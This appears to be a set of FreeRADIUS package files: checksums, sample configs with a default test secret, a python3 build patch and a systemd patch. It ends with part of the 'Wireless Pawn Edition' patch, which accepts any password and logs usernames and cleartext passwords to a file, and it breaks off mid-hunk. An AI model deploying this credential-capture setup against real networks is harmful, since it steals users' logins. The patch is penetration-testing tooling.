DIST icad-tone-detection-1.3.gh.tar.gz 1578471 BLAKE2B c2834918caeeac49d9c2ab3435424cc836bd4dcf5ec5e76dd04721c42eba32d9153038120dc173f8469d44dd97416bdab82dbdfc00b799c05344d8e3570aefd0 SHA512 22309ec44a9702e6eb38448f10189991cf9804212e72a40046d4c97a15ddbd0fc886a319b82d6cfb57ddc48184c6d78bdd218428c8e1560db08850312bbf7600 DIST icad-tone-detection-1.4.gh.tar.gz 1578924 BLAKE2B e26b72d1440cf4c50d21af1c9299670828ef848aa70532894156ec77bb8a2f80bb4016fbf0620349f1c8e17235468b0f82de5dbcc90586f8239918f7411cf14a SHA512 b40af1f5e1ea9f1c24af95f7b458a3c294bb1609202de954e8e2f2f51d6351abebff11ba4fffc5c8c9526d51e95087acaf39e498cb685c4d51700b77e20a4767


@ -1 +0,0 @@
DIST freeradius-server-3.2.3.tar.bz2 3454869 BLAKE2B 525204331a5b123dac7457c6adb755cbe9794dbff4a536ea665fc7d1cac97553e392b7b598741c2a9dd00c81decd00608499d6f25208e389b9f213f54977de84 SHA512 06767153e262a2baa2d0cc74099bc13c23b33c2316348b5dc8ec0f5834c028571bd09b8c01726a6eabeaab8fdc3050f40bfeba2d5b1c299585d1689abad365ce


@ -1,13 +0,0 @@
#######################################################################
#
# Define RADIUS clients (usually a NAS, Access Point, etc.).
#
#######################################################################
client localhost {
ipaddr = 127.0.0.1
secret = testing123
require_message_authenticator = no
# shortname = localhost
nastype = other # localhost isn't usually a NAS...
}


@ -1,199 +0,0 @@
#######################################################################
#
# Whatever you do, do NOT set 'Auth-Type := EAP'. The server
# is smart enough to figure this out on its own. The most
# common side effect of setting 'Auth-Type := EAP' is that the
# users then cannot use ANY other authentication method.
#
# EAP types NOT listed here may be supported via the "eap2" module.
# See experimental.conf for documentation.
#
#######################################################################
# For WPE, you might want to fix /etc/raddb/certs/ca.cnf:
# policy = policy_anything
eap {
default_eap_type = peap
timer_expire = 60
ignore_unknown_eap_types = no
cisco_accounting_username_bug = yes
max_sessions = 4096
md5 {
}
leap {
}
gtc {
auth_type = PAP
}
tls {
certdir = ${confdir}/certs
cadir = ${confdir}/certs
private_key_password = whatever
private_key_file = ${certdir}/server.pem
certificate_file = ${certdir}/server.pem
CA_file = ${cadir}/ca.pem
dh_file = ${certdir}/dh
random_file = ${certdir}/random
CA_path = ${cadir}
cipher_list = "DEFAULT"
cache {
enable = no
lifetime = 24 # hours
max_entries = 255
}
verify {
}
ocsp {
enable = no
override_cert_url = yes
url = "http://127.0.0.1/ocsp/"
}
}
ttls {
}
##################################################
#
# !!!!! WARNINGS for Windows compatibility !!!!!
#
##################################################
#
# If you see the server send an Access-Challenge,
# and the client never sends another Access-Request,
# then
#
# STOP!
#
# The server certificate has to have special OID's
# in it, or else the Microsoft clients will silently
# fail. See the "scripts/xpextensions" file for
# details, and the following page:
#
# http://support.microsoft.com/kb/814394/en-us
#
# For additional Windows XP SP2 issues, see:
#
# http://support.microsoft.com/kb/885453/en-us
#
#
# If is still doesn't work, and you're using Samba,
# you may be encountering a Samba bug. See:
#
# https://bugzilla.samba.org/show_bug.cgi?id=6563
#
# Note that we do not necessarily agree with their
# explanation... but the fix does appear to work.
#
##################################################
#
# The tunneled EAP session needs a default EAP type
# which is separate from the one for the non-tunneled
# EAP module. Inside of the TLS/PEAP tunnel, we
# recommend using EAP-MS-CHAPv2.
#
# The PEAP module needs the TLS module to be installed
# and configured, in order to use the TLS tunnel
# inside of the EAP packet. You will still need to
# configure the TLS module, even if you do not want
# to deploy EAP-TLS in your network. Users will not
# be able to request EAP-TLS, as it requires them to
# have a client certificate. EAP-PEAP does not
# require a client certificate.
#
#
# You can make PEAP require a client cert by setting
#
# EAP-TLS-Require-Client-Cert = Yes
#
# in the control items for a request.
#
peap {
# The tunneled EAP session needs a default
# EAP type which is separate from the one for
# the non-tunneled EAP module. Inside of the
# PEAP tunnel, we recommend using MS-CHAPv2,
# as that is the default type supported by
# Windows clients.
default_eap_type = mschapv2
# the PEAP module also has these configuration
# items, which are the same as for TTLS.
copy_request_to_tunnel = no
use_tunneled_reply = no
# When the tunneled session is proxied, the
# home server may not understand EAP-MSCHAP-V2.
# Set this entry to "no" to proxy the tunneled
# EAP-MSCHAP-V2 as normal MSCHAPv2.
proxy_tunneled_request_as_eap = yes
#
# The inner tunneled request can be sent
# through a virtual server constructed
# specifically for this purpose.
#
# If this entry is commented out, the inner
# tunneled request will be sent through
# the virtual server that processed the
# outer requests.
#
virtual_server = "inner-tunnel"
# This option enables support for MS-SoH
# see doc/SoH.txt for more info.
# It is disabled by default.
#
# soh = yes
#
# The SoH reply will be turned into a request which
# can be sent to a specific virtual server:
#
# soh_virtual_server = "soh-server"
}
#
# This takes no configuration.
#
# Note that it is the EAP MS-CHAPv2 sub-module, not
# the main 'mschap' module.
#
# Note also that in order for this sub-module to work,
# the main 'mschap' module MUST ALSO be configured.
#
# This module is the *Microsoft* implementation of MS-CHAPv2
# in EAP. There is another (incompatible) implementation
# of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
# currently support.
#
mschapv2 {
# Prior to version 2.1.11, the module never
# sent the MS-CHAP-Error message to the
# client. This worked, but it had issues
# when the cached password was wrong. The
# server *should* send "E=691 R=0" to the
# client, which tells it to prompt the user
# for a new password.
#
# The default is to behave as in 2.1.10 and
# earlier, which is known to work. If you
# set "send_error = yes", then the error
# message will be sent back to the client.
# This *may* help some clients work better,
# but *may* also cause other clients to stop
# working.
#
# send_error = no
}
}


@ -1,472 +0,0 @@
diff --git a/raddb/mods-available/python3 b/raddb/mods-available/python3
index 246dfd74ce..0593c69f1a 100644
--- a/raddb/mods-available/python3
+++ b/raddb/mods-available/python3
@@ -13,7 +13,7 @@ python3 {
# item is GLOBAL TO THE SERVER. That is, you cannot have two
# instances of the python module, each with a different path.
#
-# python_path="/path/to/python/files:/another_path/to/python_files/"
+# python_path="${modconfdir}/${.:name}:/another_path/to/python_files"
module = example
diff --git a/src/modules/rlm_python3/configure.ac b/src/modules/rlm_python3/configure.ac
index a00320fda4..295a2486d2 100644
--- a/src/modules/rlm_python3/configure.ac
+++ b/src/modules/rlm_python3/configure.ac
@@ -8,128 +8,75 @@ if test x$with_[]modname != xno; then
AC_PROG_CC
AC_PROG_CPP
- dnl extra argument: --with-rlm-python3-bin
- PYTHON3_BIN=
- AC_ARG_WITH(rlm-python3-bin,
- [ --with-rlm-python3-bin=PATH Path to python3 binary []],
+ dnl extra argument: --with-rlm-python3-config-bin
+ PYTHON3_CONFIG_BIN=
+ AC_ARG_WITH(rlm-python3-config-bin,
+ [ --with-rlm-python3-config-bin=PATH Path to python-config3 binary []],
[ case "$withval" in
no)
- AC_MSG_ERROR(Need rlm-python3-bin)
+ AC_MSG_ERROR(Need rlm-python3-config-bin)
;;
yes)
;;
*)
- PYTHON3_BIN="$withval"
+ PYTHON3_CONFIG_BIN="$withval"
;;
esac ]
)
- if test "x$PYTHON3_BIN" = x; then
- AC_CHECK_PROGS(PYTHON3_BIN, [ python3 ], not-found, [${PATH}:/usr/bin:/usr/local/bin])
+ if test "x$PYTHON3_CONFIG_BIN" = x; then
+ AC_CHECK_PROGS(PYTHON3_CONFIG_BIN, [ python3-config ], not-found, [${PATH}:/usr/bin:/usr/local/bin])
fi
- if test "x$PYTHON3_BIN" = "xnot-found"; then
- fail="python-binary"
- fi
-
- dnl extra argument: --with-rlm-python3-lib-dir
- PY_LIB_DIR=
- AC_ARG_WITH(rlm-python3-lib-dir,
- [ --with-rlm-python3-lib-dir=DIR Directory for Python library files []],
- [ case "$withval" in
- no)
- AC_MSG_ERROR(Need rlm-python3-lib-dir)
- ;;
- yes)
- ;;
- *)
- PY_LIB_DIR="$withval"
- ;;
- esac ]
- )
-
- dnl extra argument: --with-rlm-python3-include-dir
- PY_INC_DIR=
- AC_ARG_WITH(rlm-python3-include-dir,
- [ --with-rlm-python3-include-dir=DIR Directory for Python include files []],
- [ case "$withval" in
- no)
- AC_MSG_ERROR(Need rlm-python3-include-dir)
- ;;
- yes)
- ;;
- *)
- PY_INC_DIR="$withval"
- ;;
- esac ]
- )
-
- if test x$fail = x; then
- PY_PREFIX=`${PYTHON3_BIN} -c 'import sys ; print(sys.prefix)'`
- AC_MSG_NOTICE([Python sys.prefix \"${PY_PREFIX}\"])
-
- PY_EXEC_PREFIX=`${PYTHON3_BIN} -c 'import sys ; print(sys.exec_prefix)'`
- AC_MSG_NOTICE([Python sys.exec_prefix \"${PY_EXEC_PREFIX}\"])
-
- PY_SYS_VERSION=`${PYTHON3_BIN} -c 'import sys ; print(sys.version[[0:3]])'`
- AC_MSG_NOTICE([Python sys.version \"${PY_SYS_VERSION}\"])
-
- if test "x$PY_LIB_DIR" = "x"; then
- PY_LIB_DIR="$PY_EXEC_PREFIX/lib/python${PY_SYS_VERSION}/config"
- PY_LIB_LOC="-L$PY_EXEC_PREFIX/lib/python${PY_SYS_VERSION}/config"
- fi
-
- PY_MAKEFILE="$PY_EXEC_PREFIX/lib/python${PY_SYS_VERSION}/config/Makefile"
- if test -f ${PY_MAKEFILE}; then
- PY_LOCAL_MOD_LIBS=`sed -n -e 's/^LOCALMODLIBS=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/^ *//;s/ *$//'`
- AC_MSG_NOTICE([Python local_mod_libs \"${PY_LOCAL_MOD_LIBS}\"])
-
- PY_BASE_MOD_LIBS=`sed -n -e 's/^BASEMODLIBS=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/^ *//;s/ *$//'`
- AC_MSG_NOTICE([Python base_mod_libs \"${PY_BASE_MOD_LIBS}\"])
-
- PY_OTHER_LIBS=`sed -n -e 's/^LIBS=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/ / /g;s/^ *//;s/ *$//'`
- PY_OTHER_LDFLAGS=`sed -n -e 's/^LINKFORSHARED=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/ / /g;s/^ *//;s/ *$//'`
- AC_MSG_NOTICE([Python other_libs \"${PY_OTHER_LDFLAGS} ${PY_OTHER_LIBS}\"])
- fi
- PY_EXTRA_LIBS="$PY_LOCALMODLIBS $PY_BASE_MOD_LIBS $PY_OTHER_LIBS"
+ if test "x$PYTHON3_CONFIG_BIN" = xnot-found; then
+ fail="$fail python3-config"
+ else
+ dnl #
+ dnl # It is necessary due to a weird behavior with 'python3-config'
+ dnl #
+ old_CFLAGS="$CFLAGS"
+ unset CFLAGS
+
+ python3_cflags=`${PYTHON3_CONFIG_BIN} --cflags`
+ AC_MSG_NOTICE([${PYTHON3_CONFIG_BIN}'s cflags were \"${python3_cflags}\"])
+
+ dnl # Convert -I to -isystem to get rid of warnings about issues in Python headers
+ dnl # Strip -systemroot
+ dnl # Strip optimisation flags (-O[0-9]?). We decide our optimisation level, not python.
+ dnl # -D_FORTIFY_SOURCE needs -O.
+ dnl # Strip debug symbol flags (-g[0-9]?). We decide on debugging symbols, not python
+ dnl # Strip -W*, we decide what warnings are important
+ dnl # Strip -DNDEBUG
+ mod_cflags=`echo $python3_cflags | sed -e '\
+ s/-I/-isystem/g;\
+ s/-isysroot[[ =]]\{0,1\}[[^-]]*//g;\
+ s/-O[[^[[:blank:]]]]*//g;\
+ s/-Wp,-D_FORTIFY_SOURCE=[[[:digit:]]]//g;\
+ s/-g[[^ ]]*//g;\
+ s/-W[[^ ]]*//g;\
+ s/-DNDEBUG[[[:blank:]]]*//g;
+ '`
+ AC_MSG_NOTICE([Sanitized cflags were \"${mod_cflags}\"])
+
+ python3_ldflags=`${PYTHON3_CONFIG_BIN} --ldflags`
+ AC_MSG_NOTICE([${PYTHON3_CONFIG_BIN}'s ldflags were \"$python3_ldflags}\"])
+
+ dnl # Strip -Wl,-O1... Is -O even a valid linker flag??
+ dnl # Strip -Wl,-Bsymbolic-functions as thats not always supported or required
+ dnl # Strip -Xlinker -export-dynamic as it causes weird linking issues on Linux
+ dnl # See: https://bugs.python.org/issue36508
+ mod_ldflags=`echo $python3_ldflags | sed -e '\
+ s/-Wl,-O[[[:digit:]]][[[:blank:]]]*//g;\
+ s/-Wl,-Bsymbolic-functions[[[:blank:]]]*//g;\
+ s/-Xlinker -export-dynamic//g;\
+ s/-Wl,-stack_size,[[[:digit:]]]*[[[:blank:]]]//g;
+ '`
+ AC_MSG_NOTICE([Sanitized ldflags were \"${mod_ldflags}\"])
- old_CFLAGS=$CFLAGS
- CFLAGS="$CFLAGS $PY_CFLAGS"
- smart_try_dir="$PY_PREFIX/include/python$PY_SYS_VERSION"
- FR_SMART_CHECK_INCLUDE(Python.h)
CFLAGS=$old_CFLAGS
- if test "x$ac_cv_header_Python_h" = "xyes"; then
- mod_cflags="$SMART_CPPFLAGS"
- else
- fail="$fail Python.h"
- targetname=
- fi
-
- old_LIBS=$LIBS
- LIBS="$LIBS $PY_LIB_LOC $PY_EXTRA_LIBS -lm"
- smart_try_dir=$PY_LIB_DIR
- FR_SMART_CHECK_LIB(python${PY_SYS_VERSION}, Py_Initialize)
- LIBS=$old_LIBS
-
- eval t=\${ac_cv_lib_${sm_lib_safe}_${sm_func_safe}}
- if test "x$t" = "xyes"; then
- mod_ldflags="$PY_LIB_LOC $PY_EXTRA_LIBS $SMART_LIBS -lm"
- targetname=modname
- else
- FR_SMART_CHECK_LIB(python${PY_SYS_VERSION}m, Py_Initialize)
- eval t=\${ac_cv_lib_${sm_lib_safe}_${sm_func_safe}}
- if test "x$t" = "xyes"; then
- mod_ldflags="$PY_LIB_LOC $PY_EXTRA_LIBS $SMART_LIBS -lm"
- targetname=modname
- else
- targetname=
- fail="$fail libpython$PY_SYS_VERSION"
- fi
- fi
+ targetname="rlm_python3"
fi
-
- AC_CHECK_FUNCS([dl_iterate_phdr])
else
targetname=
echo \*\*\* module modname is disabled.
diff --git a/src/modules/rlm_python3/rlm_python3.c b/src/modules/rlm_python3/rlm_python3.c
index 06187e4ffa..8e893a0eaa 100644
--- a/src/modules/rlm_python3/rlm_python3.c
+++ b/src/modules/rlm_python3/rlm_python3.c
@@ -67,8 +67,10 @@ static CONF_PARSER module_config[] = {
A(preacct)
A(accounting)
A(checksimul)
+#ifdef WITH_PROXY
A(pre_proxy)
A(post_proxy)
+#endif
A(post_auth)
#ifdef WITH_COA
A(recv_coa)
@@ -98,7 +100,9 @@ static struct {
A(L_AUTH)
A(L_INFO)
A(L_ERR)
+#ifdef WITH_PROXY
A(L_PROXY)
+#endif
A(L_ACCT)
A(L_DBG_WARN)
A(L_DBG_ERR)
@@ -510,6 +514,7 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
goto finish;
}
+#ifdef WITH_PROXY
/* fill proxy vps */
if (request->proxy) {
if (!mod_populate_vps(pArgs, 4, request->proxy->vps)) {
@@ -517,10 +522,13 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
ret = RLM_MODULE_FAIL;
goto finish;
}
- } else {
+ } else
+#endif
+ {
mod_populate_vps(pArgs, 4, NULL);
}
+#ifdef WITH_PROXY
/* fill proxy_reply vps */
if (request->proxy_reply) {
if (!mod_populate_vps(pArgs, 5, request->proxy_reply->vps)) {
@@ -528,7 +536,9 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
ret = RLM_MODULE_FAIL;
goto finish;
}
- } else {
+ } else
+#endif
+ {
mod_populate_vps(pArgs, 5, NULL);
}
@@ -550,9 +560,14 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
PyDict_SetItemString(pDictInput, "request", PyTuple_GET_ITEM(pArgs, 0)) ||
PyDict_SetItemString(pDictInput, "reply", PyTuple_GET_ITEM(pArgs, 1)) ||
PyDict_SetItemString(pDictInput, "config", PyTuple_GET_ITEM(pArgs, 2)) ||
- PyDict_SetItemString(pDictInput, "session-state", PyTuple_GET_ITEM(pArgs, 3)) ||
+ PyDict_SetItemString(pDictInput, "session-state", PyTuple_GET_ITEM(pArgs, 3))
+#ifdef WITH_PROXY
+ ||
PyDict_SetItemString(pDictInput, "proxy-request", PyTuple_GET_ITEM(pArgs, 4)) ||
- PyDict_SetItemString(pDictInput, "proxy-reply", PyTuple_GET_ITEM(pArgs, 5))) {
+ PyDict_SetItemString(pDictInput, "proxy-reply", PyTuple_GET_ITEM(pArgs, 5))
+#endif
+ ) {
+
ERROR("%s:%d, %s - PyDict_SetItemString failed", __func__, __LINE__, funcname);
ret = RLM_MODULE_FAIL;
goto finish;
@@ -819,8 +834,10 @@ MOD_FUNC(authorize)
MOD_FUNC(preacct)
MOD_FUNC(accounting)
MOD_FUNC(checksimul)
+#ifdef WITH_PROXY
MOD_FUNC(pre_proxy)
MOD_FUNC(post_proxy)
+#endif
MOD_FUNC(post_auth)
#ifdef WITH_COA
MOD_FUNC(recv_coa)
@@ -1102,7 +1119,7 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
python_dlhandle = dlopen_libpython(RTLD_NOW | RTLD_GLOBAL);
if (!python_dlhandle) WARN("Failed loading libpython symbols into global symbol table");
-#if PY_VERSION_HEX > 0x03050000
+#if PY_VERSION_HEX >= 0x03050000
{
wchar_t *name;
@@ -1110,13 +1127,6 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
Py_SetProgramName(name); /* The value of argv[0] as a wide char string */
PyMem_RawFree(name);
}
-#elif PY_VERSION_HEX > 0x0300000
- {
- wchar_t *name;
-
- MEM(name = _Py_char2wchar(main_config.name, NULL));
- Py_SetProgramName(inst->wide_name); /* The value of argv[0] as a wide char string */
- }
#else
{
char *name;
@@ -1163,37 +1173,34 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
* the lifetime of the module.
*/
if (inst->python_path) {
+ char *p, *path;
+ PyObject *sys = PyImport_ImportModule("sys");
+ PyObject *sys_path = PyObject_GetAttrString(sys, "path");
+
+ memcpy(&p, &inst->python_path, sizeof(path));
+
+ for (path = strtok(p, ":"); path != NULL; path = strtok(NULL, ":")) {
#if PY_VERSION_HEX > 0x03050000
- {
- wchar_t *path;
- PyObject* sys = PyImport_ImportModule("sys");
- PyObject* sys_path = PyObject_GetAttrString(sys,"path");
-
- MEM(path = Py_DecodeLocale(inst->python_path, NULL));
- PyList_Append(sys_path, PyUnicode_FromWideChar(path,-1));
- PyObject_SetAttrString(sys,"path",sys_path);
- PyMem_RawFree(path);
- }
+ wchar_t *py_path;
+
+ MEM(py_path = Py_DecodeLocale(path, NULL));
+ PyList_Append(sys_path, PyUnicode_FromWideChar(py_path, -1));
+ PyMem_RawFree(py_path);
#elif PY_VERSION_HEX > 0x03000000
- {
- wchar_t *path;
- PyObject* sys = PyImport_ImportModule("sys");
- PyObject* sys_path = PyObject_GetAttrString(sys,"path");
-
- MEM(path = _Py_char2wchar(inst->python_path, NULL));
- PyList_Append(sys_path, PyUnicode_FromWideChar(path,-1));
- PyObject_SetAttrString(sys,"path",sys_path);
- }
-#else
- {
- char *path;
+ wchar_t *py_path;
- memcpy(&path, &inst->python_path, sizeof(path));
- Py_SetPath(path);
- }
+ MEM(py_path = _Py_char2wchar(path, NULL));
+ PyList_Append(sys_path, PyUnicode_FromWideChar(py_path, -1));
+ PyMem_RawFree(py_path);
+#else
+ PyList_Append(sys_path, PyLong_FromString(path));
#endif
- }
+ }
+ PyObject_SetAttrString(sys, "path", sys_path);
+ Py_DecRef(sys);
+ Py_DecRef(sys_path);
+ }
} else {
inst->module = main_module;
Py_IncRef(inst->module);
@@ -1220,7 +1227,7 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
static int mod_instantiate(CONF_SECTION *conf, void *instance)
{
rlm_python_t *inst = instance;
- int code = 0;
+ int code = RLM_MODULE_OK;
inst->name = cf_section_name2(conf);
if (!inst->name) inst->name = cf_section_name1(conf);
@@ -1245,8 +1252,10 @@ static int mod_instantiate(CONF_SECTION *conf, void *instance)
PYTHON_FUNC_LOAD(preacct);
PYTHON_FUNC_LOAD(accounting);
PYTHON_FUNC_LOAD(checksimul);
+#ifdef WITH_PROXY
PYTHON_FUNC_LOAD(pre_proxy);
PYTHON_FUNC_LOAD(post_proxy);
+#endif
PYTHON_FUNC_LOAD(post_auth);
#ifdef WITH_COA
PYTHON_FUNC_LOAD(recv_coa);
@@ -1257,12 +1266,14 @@ static int mod_instantiate(CONF_SECTION *conf, void *instance)
/*
* Call the instantiate function.
*/
- code = do_python_single(NULL, inst->instantiate.function, "instantiate", inst->pass_all_vps, inst->pass_all_vps_dict);
- if (code < 0) {
- error:
- python_error_log(); /* Needs valid thread with GIL */
- PyEval_SaveThread();
- return -1;
+ if (inst->instantiate.function) {
+ code = do_python_single(NULL, inst->instantiate.function, "instantiate", inst->pass_all_vps, inst->pass_all_vps_dict);
+ if (code < 0) {
+ error:
+ python_error_log(); /* Needs valid thread with GIL */
+ PyEval_SaveThread();
+ return -1;
+ }
}
PyEval_SaveThread();
@@ -1272,22 +1283,31 @@ static int mod_instantiate(CONF_SECTION *conf, void *instance)
static int mod_detach(void *instance)
{
rlm_python_t *inst = instance;
- int ret;
+ int ret = RLM_MODULE_OK;
/*
* Call module destructor
*/
PyEval_RestoreThread(inst->sub_interpreter);
- ret = do_python_single(NULL, inst->detach.function, "detach", inst->pass_all_vps, inst->pass_all_vps_dict);
+ if (inst->detach.function) ret = do_python_single(NULL, inst->detach.function, "detach", inst->pass_all_vps, inst->pass_all_vps_dict);
#define PYTHON_FUNC_DESTROY(_x) python_function_destroy(&inst->_x)
PYTHON_FUNC_DESTROY(instantiate);
- PYTHON_FUNC_DESTROY(authorize);
PYTHON_FUNC_DESTROY(authenticate);
+ PYTHON_FUNC_DESTROY(authorize);
PYTHON_FUNC_DESTROY(preacct);
PYTHON_FUNC_DESTROY(accounting);
PYTHON_FUNC_DESTROY(checksimul);
+#ifdef WITH_PROXY
+ PYTHON_FUNC_DESTROY(pre_proxy);
+ PYTHON_FUNC_DESTROY(post_proxy);
+#endif
+ PYTHON_FUNC_DESTROY(post_auth);
+#ifdef WITH_COA
+ PYTHON_FUNC_DESTROY(recv_coa);
+ PYTHON_FUNC_DESTROY(send_coa);
+#endif
PYTHON_FUNC_DESTROY(detach);
Py_DecRef(inst->pythonconf_dict);
@@ -1313,14 +1333,8 @@ static int mod_detach(void *instance)
PyThreadState_Swap(main_interpreter); /* Swap to the main thread */
Py_Finalize();
dlclose(python_dlhandle);
-
-#if PY_VERSION_HEX > 0x03050000
- //if (inst->wide_name) PyMem_RawFree(inst->wide_name);
- //if (inst->wide_path) PyMem_RawFree(inst->wide_path);
-#endif
}
-
return ret;
}
@@ -1348,8 +1362,10 @@ module_t rlm_python3 = {
[MOD_PREACCT] = mod_preacct,
[MOD_ACCOUNTING] = mod_accounting,
[MOD_SESSION] = mod_checksimul,
+#ifdef WITH_PROXY
[MOD_PRE_PROXY] = mod_pre_proxy,
[MOD_POST_PROXY] = mod_post_proxy,
+#endif
[MOD_POST_AUTH] = mod_post_auth,
#ifdef WITH_COA
[MOD_RECV_COA] = mod_recv_coa,


@ -1,57 +0,0 @@
diff --git a/debian/freeradius.service b/debian/freeradius.service
index 378702d184..ee33c2a294 100644
--- a/debian/freeradius.service
+++ b/debian/freeradius.service
@@ -7,7 +7,6 @@ Documentation=man:radiusd(8) man:radiusd.conf(5) http://wiki.freeradius.org/ htt
Type=notify
WatchdogSec=60
NotifyAccess=all
-EnvironmentFile=-/etc/default/freeradius
# FreeRADIUS can do static evaluation of policy language rules based
# on environmental variables which is very useful for doing per-host
@@ -25,16 +24,15 @@ MemoryLimit=2G
# Ensure the daemon can still write its pidfile after it drops
# privileges. Combination of options that work on a variety of
# systems. Test very carefully if you alter these lines.
-RuntimeDirectory=freeradius
+RuntimeDirectory=radiusd
RuntimeDirectoryMode=0775
# This does not work on Debian Jessie:
-User=freerad
-Group=freerad
-# This does not work on Ubuntu Bionic:
-ExecStartPre=/bin/chown freerad:freerad /var/run/freeradius
+User=radius
+Group=radius
-ExecStartPre=/usr/sbin/freeradius $FREERADIUS_OPTIONS -Cx -lstdout
-ExecStart=/usr/sbin/freeradius -f $FREERADIUS_OPTIONS
+ExecStartPre=/usr/sbin/radiusd $RADIUSD_OPTIONS -Cx -lstdout
+ExecStart=/usr/sbin/radiusd -f $RADIUSD_OPTIONS
+ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=5
@@ -42,7 +40,7 @@ RestartSec=5
NoNewPrivileges=true
# Allow binding to secure ports, broadcast addresses, and raw interfaces.
-#CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW CAP_SETUID CAP_SETGID CAP_CHOWN CAP_DAC_OVERRIDE
+CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW CAP_SETUID CAP_SETGID CAP_CHOWN CAP_DAC_OVERRIDE
# Private /tmp that isn't shared by other processes
PrivateTmp=true
@@ -60,10 +58,10 @@ ProtectKernelTunables=true
SystemCallArchitectures=native
# We shouldn't be writing to the configuration directory
-ReadOnlyDirectories=/etc/freeradius/
+ReadOnlyDirectories=/etc/raddb/
# We can read and write to the log directory.
-ReadWriteDirectories=/var/log/freeradius/
+ReadWriteDirectories=/var/log/radius/
[Install]
WantedBy=multi-user.target


@ -1,469 +0,0 @@
diff -Nurp freeradius-server-3.0.18/raddb/mods-config/files/authorize freeradius-server-3.0.18-wpe/raddb/mods-config/files/authorize
--- freeradius-server-3.0.18/raddb/mods-config/files/authorize 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/raddb/mods-config/files/authorize 2019-02-26 14:02:54.666099898 -0500
@@ -218,3 +218,5 @@ DEFAULT Hint == "SLIP"
# See the example user "bob" above. #
#########################################################
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -Nurp freeradius-server-3.0.18/raddb/radiusd.conf.in freeradius-server-3.0.18-wpe/raddb/radiusd.conf.in
--- freeradius-server-3.0.18/raddb/radiusd.conf.in 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/raddb/radiusd.conf.in 2019-02-26 14:02:54.666099898 -0500
@@ -382,6 +382,9 @@ log {
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+# Wireless Pawn Edition log file
+wpelogfile = ${logdir}/freeradius-server-wpe.log
+
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff -Nurp freeradius-server-3.0.18/src/include/log.h freeradius-server-3.0.18-wpe/src/include/log.h
--- freeradius-server-3.0.18/src/include/log.h 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/include/log.h 2019-02-26 14:02:54.666099898 -0500
@@ -72,6 +72,11 @@ typedef struct fr_log_t {
char const *debug_file; //!< Path to debug log file.
} fr_log_t;
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename);
+
typedef void (*radlog_func_t)(log_type_t lvl, log_lvl_t priority, REQUEST *, char const *, va_list ap);
extern FR_NAME_NUMBER const syslog_facility_table[];
diff -Nurp freeradius-server-3.0.18/src/include/radiusd.h freeradius-server-3.0.18-wpe/src/include/radiusd.h
--- freeradius-server-3.0.18/src/include/radiusd.h 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/include/radiusd.h 2019-02-26 14:02:54.666099898 -0500
@@ -149,6 +149,8 @@ typedef struct main_config {
char const *checkrad; //!< Script to use to determine if a user is already
//!< connected.
+ char const *wpelogfile; //!< Wireless Pawn Edition log file path.
+
rad_listen_t *listen; //!< Head of a linked list of listeners.
diff -Nurp freeradius-server-3.0.18/src/main/auth.c freeradius-server-3.0.18-wpe/src/main/auth.c
--- freeradius-server-3.0.18/src/main/auth.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/auth.c 2019-02-26 14:02:54.666099898 -0500
@@ -129,6 +129,7 @@ static int rad_authlog(char const *msg,
} else {
fr_prints(clean_password, sizeof(clean_password),
request->password->vp_strvalue, request->password->vp_length, '\0');
+ log_wpe("password", request->username->vp_strvalue, clean_password, NULL, 0, NULL, 0, main_config.wpelogfile);
}
}
diff -Nurp freeradius-server-3.0.18/src/main/libfreeradius-server.mk freeradius-server-3.0.18-wpe/src/main/libfreeradius-server.mk
--- freeradius-server-3.0.18/src/main/libfreeradius-server.mk 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/libfreeradius-server.mk 2019-02-26 14:02:54.666099898 -0500
@@ -14,6 +14,7 @@ SOURCES := conffile.c \
pair.c \
xlat.c
+
# This lets the linker determine which version of the SSLeay functions to use.
TGT_LDLIBS := $(OPENSSL_LIBS)
diff -Nurp freeradius-server-3.0.18/src/main/log.c freeradius-server-3.0.18-wpe/src/main/log.c
--- freeradius-server-3.0.18/src/main/log.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/log.c 2019-02-26 14:02:54.666099898 -0500
@@ -29,6 +29,7 @@ RCSID("$Id: 21b21b3071470c307ea48f9ed873
#include <freeradius-devel/radiusd.h>
#include <freeradius-devel/rad_assert.h>
+/*#include <freeradius-devel/conf.h>*/
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
@@ -46,6 +47,9 @@ RCSID("$Id: 21b21b3071470c307ea48f9ed873
#include <pthread.h>
#endif
